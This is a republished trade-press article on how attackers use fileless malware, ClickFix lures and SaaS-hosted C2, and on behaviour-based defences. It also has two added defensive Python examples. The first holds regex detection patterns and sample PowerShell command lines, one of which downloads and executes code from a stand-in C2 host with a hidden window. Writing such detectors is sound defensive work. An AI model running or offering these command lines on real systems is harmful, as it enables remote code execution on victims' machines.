
Cyberattackers are getting more evasive: How can defenders keep up?

    OPSWAT’s Jan Miller explains how the threat landscape is changing, why legacy defences are failing and what businesses must do to protect vital systems.

    Advanced cyberattackers are no longer overwhelming systems with brute force but are increasingly relying on stealth, modularity and evasion. With these attacks slipping past traditional defences, security built for yesterday’s threats is no longer enough.

    Cybersecurity pros have become accustomed to dealing with noisy, brute-force campaigns that seek to overwhelm the target’s systems. Yet, we’re increasingly seeing threat groups opting for more evasive strategies where the aim is to remain invisible and maintain dwell time for as long as possible.

    Threat groups are leaning into multi-stage execution chains, heavy obfuscation and techniques that blend into legitimate activity. OPSWAT telemetry shows that the average number of emulation stages or nodes within multi-stage malware has jumped by 127pc in just six months. This represents a significant increase in complexity, highlighting the rise of modular, adaptive malware designed to evade common detection tools.

    One factor to consider here is the continued rise of fileless malware and living-off-the-land techniques. These attacks use trusted tools such as PowerShell or .NET reflection to execute entirely in memory – leaving no artefacts for signature-based tools to detect. Attackers are also embedding payloads in benign-seeming formats, from .NET Bitmap files to images carrying hidden code through steganography.

    Likewise, command-and-control (C2) channels now often hide within legitimate platforms such as Google Sheets and Calendar, making them harder to identify and block without disrupting legitimate business operations.

    Some new techniques are even moving away from traditional payloads entirely.

    One prominent tactic is known as ClickFix, where attackers trick users into pasting code into the Windows Run prompt. This typically comes in the guise of a technical fix for a common IT issue, but will actually complete malicious functions such as granting the attacker remote access to the user’s keyboard.

    Despite the increased complexity and sophistication of these attacks, threat groups will still play the numbers game and launch large volumes of attacks. The number of phishing attacks has continued to increase in recent years, with credential theft attempts surging by more than 160pc so far in 2025 alone.

    Why are legacy tools not enough to protect organisations?

    Simply put, legacy security tools were built for a different era of cyberthreats. Signature and reputation-based tools once offered a strong first line of defence, but their success forced attackers to evolve.

    Therefore, while some groups are still relying on the same archaic tactics, a growing volume of modern malware is designed to bypass such methods. Our analysis shows that one in every 14 threats goes undetected by public feeds and is only identified later through behavioural analysis. This results in a significant blind spot where attacks are unlikely to be noticed in a timely manner.

    One of the biggest issues that organisations face is that so many security stacks are built around detecting known threat signatures. Because fileless and memory-only malware never writes to disk, there is no signature for these tools to match. Therefore, such malware is largely invisible to traditional detection.
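    The fileless and living-off-the-land activity described earlier (PowerShell running in memory, .NET reflection, the ClickFix Run-prompt trick) leaves no file to hash, but it does leave process-creation telemetry. The following is an added example of the kind of behaviour-first scoring the article argues for; it is not OPSWAT's code, the rule weights and threshold are illustrative assumptions, and the sample events are constructed.

```python
import re

# Behaviour-first heuristics for process-creation events (image, parent image,
# command line). Rule weights are illustrative, not any vendor's scoring.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
RULES = [
    ("encoded_command", 3, re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden_window", 2, re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("profile_or_policy_bypass", 1,
     re.compile(r"-(nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)),
    ("in_memory_download", 4,   # fetch-and-evaluate without touching disk, either order
     re.compile(r"(iex|invoke-expression)\b.*\b(downloadstring|downloaddata|iwr)\b"
                r"|\b(downloadstring|downloaddata|iwr)\b.*\|\s*(iex|invoke-expression)\b", re.I)),
    ("reflective_load", 4, re.compile(r"\[(system\.)?reflection\.assembly\]::load", re.I)),
]
RUN_PROMPT_WEIGHT = 3  # interpreter spawned straight from explorer.exe (Win+R) with stealth flags


def score_event(event):
    """Return (score, [rule names]) for one process-creation event."""
    cmd = event["command_line"]
    hits = [name for name, _, pat in RULES if pat.search(cmd)]
    score = sum(w for name, w, _ in RULES if name in hits)
    # ClickFix-style launch: the Run prompt spawns the interpreter under explorer.exe.
    # Shortcuts do that too, so it only counts once the command line already looks evasive.
    if event["parent"].lower() == "explorer.exe" and event["image"].lower() in INTERPRETERS and hits:
        hits.append("run_prompt_parent")
        score += RUN_PROMPT_WEIGHT
    return score, hits


def triage(events, threshold=4):
    """Return [(event id, score, hits)] for events scoring at or above the threshold."""
    return [(ev["id"], s, h) for ev in events for s, h in [score_event(ev)] if s >= threshold]


# Constructed sample events, not real telemetry; the URL uses the reserved .invalid TLD
# and the encoded argument is just base64 for the word "Placeholder".
SAMPLE_EVENTS = [
    {"id": 1, "image": "powershell.exe", "parent": "cmd.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"id": 2, "image": "powershell.exe", "parent": "winword.exe",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://c2.example.invalid/x')\""},
    {"id": 3, "image": "powershell.exe", "parent": "explorer.exe",
     "command_line": "powershell -w hidden -enc UGxhY2Vob2xkZXI="},
    {"id": 4, "image": "powershell.exe", "parent": "svchost.exe",
     "command_line": "powershell -c \"[Reflection.Assembly]::Load($bytes)\""},
]
```

    Only the routine backup script stays below the threshold; the Office-spawned download-and-evaluate, the Run-prompt launch and the reflective load are all surfaced without any file hash being involved.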

    In addition, attackers use advanced obfuscation layers and commercial packers to hide payloads, often embedding them in corrupted Office files or uncommon executable formats that confuse static scanners. These protective wrappers mean that even known malware families can be difficult for traditional antivirus and endpoint detection and response (EDR) stacks to detect and identify.

    Adversaries are also specifically exploiting reputation-based security systems, as they struggle when C2 traffic is hidden within widely used platforms like Google Sheets. Hiding C2 traffic inside legitimate SaaS architecture increases the attacker’s ability to evade detection and maintain persistence for longer.
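    Because the destination is a trusted Google host, reputation checks pass; what gives C2 away is the traffic's rhythm rather than its address. As an added example (not OPSWAT's code), the following flags flows to the same host whose request gaps are too regular for a person, using the coefficient of variation of inter-request intervals. The host name is real but every log line is constructed, and the 0.1 threshold and minimum of six requests are assumptions to tune per environment.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, one request per line: "<timestamp> <client> <host> <bytes>".
# The Google host is real, the traffic is invented: client 10.0.0.5 polls it every ~60 s
# with slight jitter, client 10.0.0.9 is an ordinary user editing a sheet.
SAMPLE_LOG = """\
2025-06-01T09:00:00 10.0.0.5 sheets.googleapis.com 812
2025-06-01T09:00:05 10.0.0.9 sheets.googleapis.com 2310
2025-06-01T09:00:12 10.0.0.9 sheets.googleapis.com 9984
2025-06-01T09:01:01 10.0.0.5 sheets.googleapis.com 815
2025-06-01T09:01:59 10.0.0.5 sheets.googleapis.com 809
2025-06-01T09:03:01 10.0.0.5 sheets.googleapis.com 812
2025-06-01T09:03:40 10.0.0.9 sheets.googleapis.com 451
2025-06-01T09:04:00 10.0.0.5 sheets.googleapis.com 811
2025-06-01T09:04:02 10.0.0.9 sheets.googleapis.com 17760
2025-06-01T09:05:01 10.0.0.5 sheets.googleapis.com 814
2025-06-01T09:05:59 10.0.0.5 sheets.googleapis.com 810
2025-06-01T09:15:30 10.0.0.9 sheets.googleapis.com 3022
2025-06-01T09:15:33 10.0.0.9 sheets.googleapis.com 120
"""


def parse(log):
    """Group request timestamps by (client, host) flow."""
    flows = defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, host, _size = line.split()
        flows[(client, host)].append(datetime.fromisoformat(ts))
    return flows


def beacon_score(times):
    """Coefficient of variation of the gaps between requests; near 0 means metronomic."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 4 or statistics.mean(gaps) == 0:
        return None
    return statistics.pstdev(gaps) / statistics.mean(gaps)


def find_beacons(log, max_cv=0.1, min_requests=6):
    """Flag flows that are both frequent enough and too regular for a human."""
    flagged = []
    for (client, host), times in parse(log).items():
        cv = beacon_score(times) if len(times) >= min_requests else None
        if cv is not None and cv <= max_cv:
            flagged.append((client, host, round(cv, 3)))
    return flagged
```

    Real beacons add jitter and sleep, so in production the window is hours rather than minutes and the score is combined with byte-size uniformity and request-count baselines before anything is blocked.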

    Truthfully, even without these new tactics, legacy stacks would still be straining under the rapid expansion of the attack surface. Most organisations have pursued digitalisation efforts that have steadily increased the size and complexity of their IT environments. This means more systems to manage and secure, and OPSWAT anticipates as many as 50,000 new vulnerabilities this year – far too many for static, reactive and siloed tools to manage.

    What do businesses need to do to protect critical systems?

    These new tactics can seem daunting, but it’s important to remember they exist precisely because older defences were so effective. Thus, it’s not impossible for enterprises to repel these attacks, but a strategic, adaptive response is essential.

    The first step is recognising that outdated, reactive tools are no longer enough. Adaptive, behaviour-first detection pipelines are needed to keep up with the latest evasive tactics.

    We need to focus on how threats act, not just what they look like; this means building modern detection pipelines that combine emulation-based sandboxing with machine learning-powered threat hunting capabilities to uncover hidden intent across every stage of the kill chain.

    Just as we’ve noticed a steep increase in complex, multi-layered malware tactics, defences must respond with multiple levels. Layering reputation checks with behavioural analysis means organisations have a much better chance of detecting threats from the moment of initial access, increasing the odds of stopping them before they can reach their goals.

    Content disarm and reconstruction (CDR) is important here, treating all incoming files as potentially malicious, and rebuilding and sanitising them to remove any threats. Alongside this, implementing managed file transfer (MFT) capabilities will increase visibility into file-borne threats and automatically block or sandbox suspicious transfers.

    This strategy greatly improves detection capabilities across executables, scripts and documents. Crucially, it also closes the gap on zero-day and fileless threats that are out of reach for traditional antivirus software.

    Security architectures must also counter the increasingly subtle methods adversaries are using to establish C2 traffic. One effective method here is the use of data diodes, which are hardware units that enforce unidirectional data flow. This prevents the use of hidden exfiltration tactics.

    It’s important to remember that resilience is about more than buying the latest technology – solutions must be reinforced by the right processes. Adopting continuous detection and response practices will help ensure constant monitoring, containment and remediation. Risk-based vulnerability management processes are also vital to prioritise where limited resources are spent as the number of vulnerabilities grows.

    Investing in adaptive, intelligence-driven defences allows organisations to level the playing field against an adversary playbook built on stealth, speed and constant evolution.

    By Jan Miller

    Jan Miller is CTO of Threat Analysis at OPSWAT. He leads the security operations product suite, focusing on ML-based threat hunting and sandboxing solutions. A serial entrepreneur and developer, Miller has founded and led multiple cybersecurity start-ups centered around automated malware analysis.

    www.siliconrepublic.com (Article Sourced Website)